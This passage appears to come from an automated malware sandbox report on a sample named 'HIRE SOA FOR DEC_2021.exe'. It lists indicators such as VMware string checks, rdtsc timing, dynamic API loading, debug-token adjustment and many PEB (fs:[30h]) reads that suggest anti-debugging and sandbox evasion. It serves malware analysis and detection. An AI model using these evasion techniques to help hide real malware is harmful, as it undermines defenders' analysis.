Source: explorer.exe, 00000005.00000000.688116349.0000000004791000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA~
Source: explorer.exe, 00000005.00000000.679317249.000000000A716000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.679551971.000000000A784000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405DA3

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 3_2_004088E0 rdtsc

3_2_004088E0

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_1AC70402 mov eax, dword ptr fs:[00000030h]	1_2_1AC70402
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_1AC706C7 mov eax, dword ptr fs:[00000030h]	1_2_1AC706C7
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_1AC70744 mov eax, dword ptr fs:[00000030h]	1_2_1AC70744
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_1AC70706 mov eax, dword ptr fs:[00000030h]	1_2_1AC70706
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 1_2_1AC70616 mov eax, dword ptr fs:[00000030h]	1_2_1AC70616
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7F0BF mov ecx, dword ptr fs:[00000030h]	3_2_00B7F0BF
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7F0BF mov eax, dword ptr fs:[00000030h]	3_2_00B7F0BF
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7F0BF mov eax, dword ptr fs:[00000030h]	3_2_00B7F0BF
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B890AF mov eax, dword ptr fs:[00000030h]	3_2_00B890AF
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B720A0 mov eax, dword ptr fs:[00000030h]	3_2_00B720A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B720A0 mov eax, dword ptr fs:[00000030h]	3_2_00B720A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B720A0 mov eax, dword ptr fs:[00000030h]	3_2_00B720A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B720A0 mov eax, dword ptr fs:[00000030h]	3_2_00B720A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B720A0 mov eax, dword ptr fs:[00000030h]	3_2_00B720A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B720A0 mov eax, dword ptr fs:[00000030h]	3_2_00B720A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B49080 mov eax, dword ptr fs:[00000030h]	3_2_00B49080
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC3884 mov eax, dword ptr fs:[00000030h]	3_2_00BC3884
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC3884 mov eax, dword ptr fs:[00000030h]	3_2_00BC3884
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B440E1 mov eax, dword ptr fs:[00000030h]	3_2_00B440E1
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B440E1 mov eax, dword ptr fs:[00000030h]	3_2_00B440E1
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B440E1 mov eax, dword ptr fs:[00000030h]	3_2_00B440E1
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B458EC mov eax, dword ptr fs:[00000030h]	3_2_00B458EC
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00BDB8D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BDB8D0 mov ecx, dword ptr fs:[00000030h]	3_2_00BDB8D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00BDB8D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00BDB8D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00BDB8D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]	3_2_00BDB8D0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7002D mov eax, dword ptr fs:[00000030h]	3_2_00B7002D
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7002D mov eax, dword ptr fs:[00000030h]	3_2_00B7002D
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7002D mov eax, dword ptr fs:[00000030h]	3_2_00B7002D
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7002D mov eax, dword ptr fs:[00000030h]	3_2_00B7002D
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7002D mov eax, dword ptr fs:[00000030h]	3_2_00B7002D
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5B02A mov eax, dword ptr fs:[00000030h]	3_2_00B5B02A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5B02A mov eax, dword ptr fs:[00000030h]	3_2_00B5B02A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5B02A mov eax, dword ptr fs:[00000030h]	3_2_00B5B02A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5B02A mov eax, dword ptr fs:[00000030h]	3_2_00B5B02A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC7016 mov eax, dword ptr fs:[00000030h]	3_2_00BC7016
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC7016 mov eax, dword ptr fs:[00000030h]	3_2_00BC7016
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC7016 mov eax, dword ptr fs:[00000030h]	3_2_00BC7016
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C02073 mov eax, dword ptr fs:[00000030h]	3_2_00C02073
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C11074 mov eax, dword ptr fs:[00000030h]	3_2_00C11074
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C14015 mov eax, dword ptr fs:[00000030h]	3_2_00C14015
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C14015 mov eax, dword ptr fs:[00000030h]	3_2_00C14015
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B60050 mov eax, dword ptr fs:[00000030h]	3_2_00B60050
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B60050 mov eax, dword ptr fs:[00000030h]	3_2_00B60050
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC51BE mov eax, dword ptr fs:[00000030h]	3_2_00BC51BE
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC51BE mov eax, dword ptr fs:[00000030h]	3_2_00BC51BE
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC51BE mov eax, dword ptr fs:[00000030h]	3_2_00BC51BE
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC51BE mov eax, dword ptr fs:[00000030h]	3_2_00BC51BE
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B761A0 mov eax, dword ptr fs:[00000030h]	3_2_00B761A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B761A0 mov eax, dword ptr fs:[00000030h]	3_2_00B761A0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC69A6 mov eax, dword ptr fs:[00000030h]	3_2_00BC69A6
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B72990 mov eax, dword ptr fs:[00000030h]	3_2_00B72990
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7A185 mov eax, dword ptr fs:[00000030h]	3_2_00B7A185
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6C182 mov eax, dword ptr fs:[00000030h]	3_2_00B6C182
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4B1E1 mov eax, dword ptr fs:[00000030h]	3_2_00B4B1E1
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4B1E1 mov eax, dword ptr fs:[00000030h]	3_2_00B4B1E1
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4B1E1 mov eax, dword ptr fs:[00000030h]	3_2_00B4B1E1
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BD41E8 mov eax, dword ptr fs:[00000030h]	3_2_00BD41E8
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C049A4 mov eax, dword ptr fs:[00000030h]	3_2_00C049A4
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C049A4 mov eax, dword ptr fs:[00000030h]	3_2_00C049A4
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C049A4 mov eax, dword ptr fs:[00000030h]	3_2_00C049A4
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C049A4 mov eax, dword ptr fs:[00000030h]	3_2_00C049A4
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7513A mov eax, dword ptr fs:[00000030h]	3_2_00B7513A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7513A mov eax, dword ptr fs:[00000030h]	3_2_00B7513A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B64120 mov eax, dword ptr fs:[00000030h]	3_2_00B64120
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B64120 mov eax, dword ptr fs:[00000030h]	3_2_00B64120
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B64120 mov eax, dword ptr fs:[00000030h]	3_2_00B64120
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B64120 mov eax, dword ptr fs:[00000030h]	3_2_00B64120
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B64120 mov ecx, dword ptr fs:[00000030h]	3_2_00B64120
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B49100 mov eax, dword ptr fs:[00000030h]	3_2_00B49100
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B49100 mov eax, dword ptr fs:[00000030h]	3_2_00B49100
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B49100 mov eax, dword ptr fs:[00000030h]	3_2_00B49100
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4B171 mov eax, dword ptr fs:[00000030h]	3_2_00B4B171
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4B171 mov eax, dword ptr fs:[00000030h]	3_2_00B4B171
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4C962 mov eax, dword ptr fs:[00000030h]	3_2_00B4C962
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6B944 mov eax, dword ptr fs:[00000030h]	3_2_00B6B944
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6B944 mov eax, dword ptr fs:[00000030h]	3_2_00B6B944
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5AAB0 mov eax, dword ptr fs:[00000030h]	3_2_00B5AAB0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5AAB0 mov eax, dword ptr fs:[00000030h]	3_2_00B5AAB0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7FAB0 mov eax, dword ptr fs:[00000030h]	3_2_00B7FAB0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B452A5 mov eax, dword ptr fs:[00000030h]	3_2_00B452A5
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B452A5 mov eax, dword ptr fs:[00000030h]	3_2_00B452A5
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B452A5 mov eax, dword ptr fs:[00000030h]	3_2_00B452A5
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B452A5 mov eax, dword ptr fs:[00000030h]	3_2_00B452A5
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B452A5 mov eax, dword ptr fs:[00000030h]	3_2_00B452A5
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7D294 mov eax, dword ptr fs:[00000030h]	3_2_00B7D294
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7D294 mov eax, dword ptr fs:[00000030h]	3_2_00B7D294
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B72AE4 mov eax, dword ptr fs:[00000030h]	3_2_00B72AE4
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B72ACB mov eax, dword ptr fs:[00000030h]	3_2_00B72ACB
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B84A2C mov eax, dword ptr fs:[00000030h]	3_2_00B84A2C
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B84A2C mov eax, dword ptr fs:[00000030h]	3_2_00B84A2C
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C0EA55 mov eax, dword ptr fs:[00000030h]	3_2_00C0EA55
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6A229 mov eax, dword ptr fs:[00000030h]	3_2_00B6A229
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6A229 mov eax, dword ptr fs:[00000030h]	3_2_00B6A229
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6A229 mov eax, dword ptr fs:[00000030h]	3_2_00B6A229
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6A229 mov eax, dword ptr fs:[00000030h]	3_2_00B6A229
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6A229 mov eax, dword ptr fs:[00000030h]	3_2_00B6A229
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6A229 mov eax, dword ptr fs:[00000030h]	3_2_00B6A229
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6A229 mov eax, dword ptr fs:[00000030h]	3_2_00B6A229
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6A229 mov eax, dword ptr fs:[00000030h]	3_2_00B6A229
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6A229 mov eax, dword ptr fs:[00000030h]	3_2_00B6A229
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4AA16 mov eax, dword ptr fs:[00000030h]	3_2_00B4AA16
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4AA16 mov eax, dword ptr fs:[00000030h]	3_2_00B4AA16
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C18A62 mov eax, dword ptr fs:[00000030h]	3_2_00C18A62
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B45210 mov eax, dword ptr fs:[00000030h]	3_2_00B45210
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B45210 mov ecx, dword ptr fs:[00000030h]	3_2_00B45210
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B45210 mov eax, dword ptr fs:[00000030h]	3_2_00B45210
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B45210 mov eax, dword ptr fs:[00000030h]	3_2_00B45210
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B63A1C mov eax, dword ptr fs:[00000030h]	3_2_00B63A1C
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B58A0A mov eax, dword ptr fs:[00000030h]	3_2_00B58A0A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B8927A mov eax, dword ptr fs:[00000030h]	3_2_00B8927A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C0AA16 mov eax, dword ptr fs:[00000030h]	3_2_00C0AA16
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C0AA16 mov eax, dword ptr fs:[00000030h]	3_2_00C0AA16
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BFB260 mov eax, dword ptr fs:[00000030h]	3_2_00BFB260
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BFB260 mov eax, dword ptr fs:[00000030h]	3_2_00BFB260
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BD4257 mov eax, dword ptr fs:[00000030h]	3_2_00BD4257
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B49240 mov eax, dword ptr fs:[00000030h]	3_2_00B49240
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B49240 mov eax, dword ptr fs:[00000030h]	3_2_00B49240
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B49240 mov eax, dword ptr fs:[00000030h]	3_2_00B49240
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B49240 mov eax, dword ptr fs:[00000030h]	3_2_00B49240
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B74BAD mov eax, dword ptr fs:[00000030h]	3_2_00B74BAD
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B74BAD mov eax, dword ptr fs:[00000030h]	3_2_00B74BAD
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B74BAD mov eax, dword ptr fs:[00000030h]	3_2_00B74BAD
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B72397 mov eax, dword ptr fs:[00000030h]	3_2_00B72397
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7B390 mov eax, dword ptr fs:[00000030h]	3_2_00B7B390
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B51B8F mov eax, dword ptr fs:[00000030h]	3_2_00B51B8F
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B51B8F mov eax, dword ptr fs:[00000030h]	3_2_00B51B8F
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BFD380 mov ecx, dword ptr fs:[00000030h]	3_2_00BFD380
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C0138A mov eax, dword ptr fs:[00000030h]	3_2_00C0138A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B703E2 mov eax, dword ptr fs:[00000030h]	3_2_00B703E2
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B703E2 mov eax, dword ptr fs:[00000030h]	3_2_00B703E2
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B703E2 mov eax, dword ptr fs:[00000030h]	3_2_00B703E2
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B703E2 mov eax, dword ptr fs:[00000030h]	3_2_00B703E2
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B703E2 mov eax, dword ptr fs:[00000030h]	3_2_00B703E2
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B703E2 mov eax, dword ptr fs:[00000030h]	3_2_00B703E2
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6DBE9 mov eax, dword ptr fs:[00000030h]	3_2_00B6DBE9
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C15BA5 mov eax, dword ptr fs:[00000030h]	3_2_00C15BA5
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC53CA mov eax, dword ptr fs:[00000030h]	3_2_00BC53CA
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC53CA mov eax, dword ptr fs:[00000030h]	3_2_00BC53CA
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C18B58 mov eax, dword ptr fs:[00000030h]	3_2_00C18B58
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B73B7A mov eax, dword ptr fs:[00000030h]	3_2_00B73B7A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B73B7A mov eax, dword ptr fs:[00000030h]	3_2_00B73B7A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4DB60 mov ecx, dword ptr fs:[00000030h]	3_2_00B4DB60
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C0131B mov eax, dword ptr fs:[00000030h]	3_2_00C0131B
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4F358 mov eax, dword ptr fs:[00000030h]	3_2_00B4F358
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B4DB40 mov eax, dword ptr fs:[00000030h]	3_2_00B4DB40
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C18CD6 mov eax, dword ptr fs:[00000030h]	3_2_00C18CD6
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B5849B mov eax, dword ptr fs:[00000030h]	3_2_00B5849B
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C014FB mov eax, dword ptr fs:[00000030h]	3_2_00C014FB
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC6CF0 mov eax, dword ptr fs:[00000030h]	3_2_00BC6CF0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC6CF0 mov eax, dword ptr fs:[00000030h]	3_2_00BC6CF0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC6CF0 mov eax, dword ptr fs:[00000030h]	3_2_00BC6CF0
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B7BC2C mov eax, dword ptr fs:[00000030h]	3_2_00B7BC2C
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC6C0A mov eax, dword ptr fs:[00000030h]	3_2_00BC6C0A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC6C0A mov eax, dword ptr fs:[00000030h]	3_2_00BC6C0A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC6C0A mov eax, dword ptr fs:[00000030h]	3_2_00BC6C0A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00BC6C0A mov eax, dword ptr fs:[00000030h]	3_2_00BC6C0A
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C01C06 mov eax, dword ptr fs:[00000030h]	3_2_00C01C06
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C1740D mov eax, dword ptr fs:[00000030h]	3_2_00C1740D
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C1740D mov eax, dword ptr fs:[00000030h]	3_2_00C1740D
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00C1740D mov eax, dword ptr fs:[00000030h]	3_2_00C1740D
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Code function: 3_2_00B6746D mov eax, dword ptr fs:[00000030h]	3_2_00B6746D
